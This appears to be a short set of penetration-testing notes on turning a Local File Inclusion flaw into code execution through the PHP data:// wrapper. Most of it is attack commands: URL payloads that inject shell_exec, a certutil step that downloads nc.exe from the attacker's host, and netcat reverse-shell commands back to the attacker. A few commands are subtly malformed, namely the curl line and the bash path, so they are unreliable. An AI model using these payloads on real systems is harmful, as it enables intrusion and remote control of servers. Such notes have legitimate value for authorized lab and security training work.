It can be used to exploit Directory Traversal and LFI. This gives us additional flexibility when attempting to inject PHP code via LFI vulnerabilities. This wrapper provides us with an alternative payload when we cannot poison a local file with PHP code.
# We know this is vulnerable to LFI so we use a data wrapper
# Hence, LFI without manipulating the local file. # ADDING SHELL EXEC IN END TO SEE
http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("whoami")?>
Once we see the result from shell_exec, it means we got the web shell. The next step is always to transfer nc.exe (windows) or netcat binary and then get the shell back on our terminal using the following approach
1. Host a Python web server on our attacking Kali machine
2. http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("certutil.exe -urlcache -f http://<Attacking IP>/nc.exe nc.exe")?>
3. Once the nc.exe is transferred issue the following command to get the local shell
nc.exe -e cmd.exe <Kali's IP> <port>
4. If the victim is a Kali machine, transfer the Netcat binary
http://<IP>/menu.php?file=data:text/plain,<?php echo shell_exec("curl -o http://<Attacking IP>/nc.exe")?>
5. netcat -e bin/bash <Kali's IP> <port>
# Try all transfer methods if one doesn't work
